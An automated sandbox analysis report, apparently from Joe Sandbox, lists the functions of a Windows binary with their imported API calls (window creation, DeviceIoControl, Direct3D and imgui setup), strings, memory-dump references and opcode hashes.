Sleep.KERNEL32 ref: 00007FF62C0C7CD9

Strings

(, xrefs: 00007FF62C0C7C35

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: ControlDevice$Sleep
String ID: (
API String ID: 4141367757-3887548279
Opcode ID: f59ffe53ce57800b942c9cc49582da386e5ff2a800f3a1d873edffc63495bc52
Instruction ID: f39f1d50d9e4d201c53cb657547447cd927cccac679fdbeec1c81ebfd7692cb0
Opcode Fuzzy Hash: f59ffe53ce57800b942c9cc49582da386e5ff2a800f3a1d873edffc63495bc52
Instruction Fuzzy Hash: 2222FB36619B809AEB50CF50F88039A7BB4F788358F504536EA8D93B68DF3DD598CB01

Function 00007FF62C0CE170 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 81
registrythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 00007FF62C0CE196
RegisterClassExA.USER32 ref: 00007FF62C0CE1EB
GetClientRect.USER32 ref: 00007FF62C0CE208
ClientToScreen.USER32 ref: 00007FF62C0CE21D
CreateWindowExA.USER32 ref: 00007FF62C0CE28B
DwmExtendFrameIntoClientArea.DWMAPI ref: 00007FF62C0CE2A2
SetWindowLongA.USER32 ref: 00007FF62C0CE2B8
ShowWindow.USER32 ref: 00007FF62C0CE2C8
UpdateWindow.USER32 ref: 00007FF62C0CE2D5
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CE2F1

Strings

P, xrefs: 00007FF62C0CE19F
Gideion, xrefs: 00007FF62C0CE1C1
Gideion1, xrefs: 00007FF62C0CE229

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: Window$Client$Create$AreaClassExtendFrameIntoLongRectRegisterScreenShowThreadUpdateexit
String ID: Gideion$Gideion1$P
API String ID: 2855494585-533694301
Opcode ID: 2ddbc444a915477e6d26d9afe7d151a90982aa184aa07e13d43f27f361e8098f
Instruction ID: 959139ed6612c1da83098a111033e5c60152412da5ecc4ae4b3fcf1edf4770f7
Opcode Fuzzy Hash: 2ddbc444a915477e6d26d9afe7d151a90982aa184aa07e13d43f27f361e8098f
Instruction Fuzzy Hash: 7241FF75A08B8286EB10CF14FC8076AB761FB88764F544639DA9DC3664DF3DE594CB02

Function 00007FF62C0B29B0 Relevance: 22.7, APIs: 18, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B29DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2A09
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2A34
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2A5F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2A8A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2ACE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2AF9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2B31
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2BB1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2BDC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2C07
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2C32
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2C5D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2C88
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2CB3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2CDE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2D09
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B2D34

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 12c8b87299f2b5bdc6608c0954c27c51b6fa78e47271df93e4bde3ec3944f8cc
Instruction ID: 4a9d671530dcbe9231cce696bbb38a0ff63677e9efe83c8523bd163180e6c96d
Opcode Fuzzy Hash: 12c8b87299f2b5bdc6608c0954c27c51b6fa78e47271df93e4bde3ec3944f8cc
Instruction Fuzzy Hash: 99A1F761A5BA4685FE559B21CC506B923A0FF89FA0F586436CD0DC7399CF2EE6409223

Function 00007FF62C0CF670 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF62C0CF686
GetModuleHandleW.KERNEL32 ref: 00007FF62C0CF693
GetModuleHandleW.KERNEL32 ref: 00007FF62C0CF6A8
GetProcAddress.KERNEL32 ref: 00007FF62C0CF6C0
GetProcAddress.KERNEL32 ref: 00007FF62C0CF6D3
CreateEventW.KERNEL32 ref: 00007FF62C0CF6FF
DeleteCriticalSection.KERNEL32 ref: 00007FF62C0CF74B
CloseHandle.KERNEL32 ref: 00007FF62C0CF75D

Strings

SleepConditionVariableCS, xrefs: 00007FF62C0CF6B6
kernel32.dll, xrefs: 00007FF62C0CF6A1
WakeAllConditionVariable, xrefs: 00007FF62C0CF6C6
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF62C0CF68C

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: dd6af7c52e87b130b20682909fcda08af477dc62d8720e66baef83e7f0fb16bc
Instruction ID: 205f61071b42de1a4a077aed620f0b27edd9dd7a57f98bb6ac61a29d5d6d5e84
Opcode Fuzzy Hash: dd6af7c52e87b130b20682909fcda08af477dc62d8720e66baef83e7f0fb16bc
Instruction Fuzzy Hash: E7212A20A0AB0391FE159B60FC5427463A0EF48760F584034C90EC26A1EF2FAA59D323

Function 00007FF62C0C6F70 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF62C0CEBD0: DeviceIoControl.KERNEL32 ref: 00007FF62C0CEC33

Part of subcall function 00007FF62C0CED30: DeviceIoControl.KERNEL32 ref: 00007FF62C0CED93

sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C7089
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C7095
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C70A6
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C70BA
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C70C6
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C70D9
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7184
tanf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C723D

Strings

(, xrefs: 00007FF62C0C7165

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: ControlDevicecosfsinf$tanf
String ID: (
API String ID: 2523051327-3887548279
Opcode ID: aa6bbfe74aeb7b7f907682442ae4e2d87864ab0c98119cef9920742a0bee4662
Instruction ID: ad45784e655746876b44d5aa477412f747b15e779d7b9cce8601adf1ea2b8fe8
Opcode Fuzzy Hash: aa6bbfe74aeb7b7f907682442ae4e2d87864ab0c98119cef9920742a0bee4662
Instruction Fuzzy Hash: DDB1DA32D28BCD85E6029B36A8411F9B360EF6E354F199B32E94871672DF3A71C5DB01

Function 00007FF62C0C7FF0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF62C0CEBD0: DeviceIoControl.KERNEL32 ref: 00007FF62C0CEC33

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C8067
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C8084
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C809D
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C80BA
DeviceIoControl.KERNEL32 ref: 00007FF62C0C813C
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C8272
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C8292
sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C82B0

Strings

(, xrefs: 00007FF62C0C8120

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: powf$ControlDevice$sqrtsqrtf
String ID: (
API String ID: 2561187813-3887548279
Opcode ID: ac0b46b314eec62c1b60531a472fb8756049cafc971af5b36dbd49321e850655
Instruction ID: 6ed0f62e591fb748144922f42a950c3129172c051b8c250edde3079c48bfd017
Opcode Fuzzy Hash: ac0b46b314eec62c1b60531a472fb8756049cafc971af5b36dbd49321e850655
Instruction Fuzzy Hash: 75A1F432E18B4989FB02CB7698412EC7370EF6E398F048732EA4C725A5EF297185C755

Function 00007FF62C0C7CF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF62C0CEBD0: DeviceIoControl.KERNEL32 ref: 00007FF62C0CEC33

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C7D63
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C7D80
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C7D99
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C7DB6
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7E38
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C7F5F
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0C7F8A

Strings

(, xrefs: 00007FF62C0C7E1C

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: powf$ControlDevice$sqrtf
String ID: (
API String ID: 3413337882-3887548279
Opcode ID: e20ae36b0dca8b8ecdb2643989d4d28dde4676ea68f459578ad1feeac6a0660c
Instruction ID: f9b2ae0d85cc8ded98ddd04db88568de97fd99d29fbf46adafb182adffe35c60
Opcode Fuzzy Hash: e20ae36b0dca8b8ecdb2643989d4d28dde4676ea68f459578ad1feeac6a0660c
Instruction Fuzzy Hash: 0081FA32E28A4989FB02DB7698412EC7370AF6D398F188732E94C721F5DF393586C651

Function 00007FF62C0CC890 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

Direct3DCreate9Ex.D3D9 ref: 00007FF62C0CC8A0
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CC8AF
QueryPerformanceFrequency.KERNEL32 ref: 00007FF62C0CC97E
QueryPerformanceCounter.KERNEL32 ref: 00007FF62C0CC993

Strings

imgui_impl_dx9, xrefs: 00007FF62C0CCA77
, xrefs: 00007FF62C0CC95D
imgui_impl_win32, xrefs: 00007FF62C0CC9A8

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: PerformanceQuery$CounterCreate9Direct3Frequencyexit
String ID: $imgui_impl_dx9$imgui_impl_win32
API String ID: 3110895712-814279511
Opcode ID: 85baeb4b29ac218d44d1c5f062cd63047f3cf91587362f2b79abd5856a61407e
Instruction ID: ba48bd70c5089fbf54ed519d4cd26c3eb4e42276dd85f3a16d5d525719a47dda
Opcode Fuzzy Hash: 85baeb4b29ac218d44d1c5f062cd63047f3cf91587362f2b79abd5856a61407e
Instruction Fuzzy Hash: 6CC1E972C19BC186E700CF28DD092E477A0FB6979DF28A235DA4849176DF7B6197C701

Function 00007FF62C0BAE10 Relevance: 11.4, APIs: 9, Instructions: 139COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAE48
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAE77
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAEA6
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAEE1
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAF10
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAF45
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BAFCF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BB008
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BB063

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1fa0d7f857d20c47da345544d5a8268a7873b49fbc46b83298b036f43cc9957f
Instruction ID: f4e788ee1d105849f21c3bf809455f33a101e026bd452bb2258131cea24bd757
Opcode Fuzzy Hash: 1fa0d7f857d20c47da345544d5a8268a7873b49fbc46b83298b036f43cc9957f
Instruction Fuzzy Hash: E9612576A4AB4682EF14CF21E88027933A4FF44FA4F185536DE4D87759CF3AE5809362

Function 00007FF62C0B1340 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1395
memcpy.VCRUNTIME140 ref: 00007FF62C0B13AA
memchr.VCRUNTIME140 ref: 00007FF62C0B1445
memchr.VCRUNTIME140 ref: 00007FF62C0B1461
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1555

Strings

], xrefs: 00007FF62C0B1422
Window, xrefs: 00007FF62C0B147A

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memchr$freemallocmemcpy
String ID: Window$]
API String ID: 96147131-2892678728
Opcode ID: 1e3ce68fe67a919c1ef8dab996caa62a58c2a0de4ce7b14b5ffdcece7652cb46
Instruction ID: 997c48ce7f6e40c88106f8a9a7d080ddd504f789f87c4ba7d29e256dcc0840b9
Opcode Fuzzy Hash: 1e3ce68fe67a919c1ef8dab996caa62a58c2a0de4ce7b14b5ffdcece7652cb46
Instruction Fuzzy Hash: 0751D361B0D69581EF10CB569D0427AA791EF49FE4F485131DE4E87B89DF3EE9428302

Function 00007FF62C0A1510 Relevance: 9.3, APIs: 6, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 22cd4893fd4d04c37c912c98dead3dc00c251ee0ab305086f2cb2a48242b2a0b
Instruction ID: ab6c4ea7bc96d7594e326c99794e2d01664c7bb50f044d4f4e7c2709d83030e7
Opcode Fuzzy Hash: 22cd4893fd4d04c37c912c98dead3dc00c251ee0ab305086f2cb2a48242b2a0b
Instruction Fuzzy Hash: 5BE14D62A08B8684FF008B64EC403AD3761FB957B4F505635DAAC826E6DF7DE5C4C312

Function 00007FF62C0B1810 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 130stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140 ref: 00007FF62C0B1987

Strings

###, xrefs: 00007FF62C0B197D
[%s][%s], xrefs: 00007FF62C0B1991
Pos=%d,%d, xrefs: 00007FF62C0B19B1
Collapsed=%d, xrefs: 00007FF62C0B19EA
Size=%d,%d, xrefs: 00007FF62C0B19CE

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: strstr
String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
API String ID: 1392478783-2972057365
Opcode ID: a5f450357e770edd57dd14ac8067e615e87b6543b1fbfceabf829de7da304435
Instruction ID: d7f537c2ce138eded36e61270f80d42b4cfa4a9a19d303d37c782a54e7dc7576
Opcode Fuzzy Hash: a5f450357e770edd57dd14ac8067e615e87b6543b1fbfceabf829de7da304435
Instruction Fuzzy Hash: 7C51CD32A18A8286EF15CF11DC444B8B7A0FB89BA4F558136DE4C87394CF39E991CB42

Function 00007FF62C0CF0F0 Relevance: 9.1, APIs: 6, Instructions: 115COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF1E1
memcpy.VCRUNTIME140(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF1EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF228
memcpy.VCRUNTIME140(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF232
memcpy.VCRUNTIME140(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF240
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62C0CF275

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 50caa6e3a6a8c2f5aea7cf1210afe2062a3a86f6e0826d80f4304e2a235ea8f1
Instruction ID: e2b07c06988df8b606aad9692ae6bfb12f33f4027e44f96963bc5a2191a48f9e
Opcode Fuzzy Hash: 50caa6e3a6a8c2f5aea7cf1210afe2062a3a86f6e0826d80f4304e2a235ea8f1
Instruction Fuzzy Hash: 4A41C362B0978185EE149B12ED042AAA355EB48FF4F580631DFAD8B7C5DF7EE2418312

Function 00007FF62C0A1A20 Relevance: 8.8, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAE48
Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAE77
Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAEA6
Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAEE1
Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAF10
Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAF45

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1A54
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1A7F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1AA7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1ACF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1AF7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1B1F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1B47

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d836042abe27d54f972e489ca4f21c46eaf870b1b349e4f613281d5c0da16db2
Instruction ID: f08055be8da6867008db8ffccbe1670246ebab6e22bb3692c0b6e7d932034228
Opcode Fuzzy Hash: d836042abe27d54f972e489ca4f21c46eaf870b1b349e4f613281d5c0da16db2
Instruction Fuzzy Hash: A731F761B5BB1680FE559F61DC806782360FF85FA0F58A436CE0C873A5CF2EE9409253

Function 00007FF62C0A1C20 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 372COMMON

Download Yara Rule

